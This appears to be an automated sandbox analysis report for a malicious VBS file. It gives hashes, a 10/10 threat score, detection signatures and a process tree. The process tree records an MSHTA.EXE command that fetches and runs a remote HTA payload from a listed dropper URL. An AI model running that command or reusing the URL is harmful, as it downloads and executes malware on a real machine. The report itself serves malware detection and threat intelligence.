Analysis
-
max time kernel
28s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
09-08-2022 19:00
Static task
static1
Behavioral task
behavioral1
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win7-20220718-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win10v2004-20220722-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
LIYDOERWQPOKERHAVAXOCI.vbs
-
Size
1KB
-
MD5
733afa01e2447e2fcafcf4f224a1a4a7
-
SHA1
fcb94d8e29aa8bb802104a6ea49f7e715bea7031
-
SHA256
00eb25d6c95f74f9c7caded04eca76fa2a03e280448af51c1108b75b2709909a
-
SHA512
42658d2f4cbb0a75c49434644078ad5291995b415481186a66aad1fd31a3013002e6f753093f81c4d8022a7811b199e2b66270c4017a928f6bf9df72d0334948
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://tradeguru.com.pk/enc1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEdescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1380 1392 MSHTA.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
MSHTA.EXEflow pid process 4 1380 MSHTA.EXE 5 1380 MSHTA.EXE 6 1380 MSHTA.EXE 7 1380 MSHTA.EXE -
Processes:
MSHTA.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3762437355-3468409815-1164039494-1000\Software\Microsoft\Internet Explorer\Main MSHTA.EXE
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"1⤵PID:1272
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc11⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1380
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1380-54-0x000007FEFBF31000-0x000007FEFBF33000-memory.dmpFilesize
8KB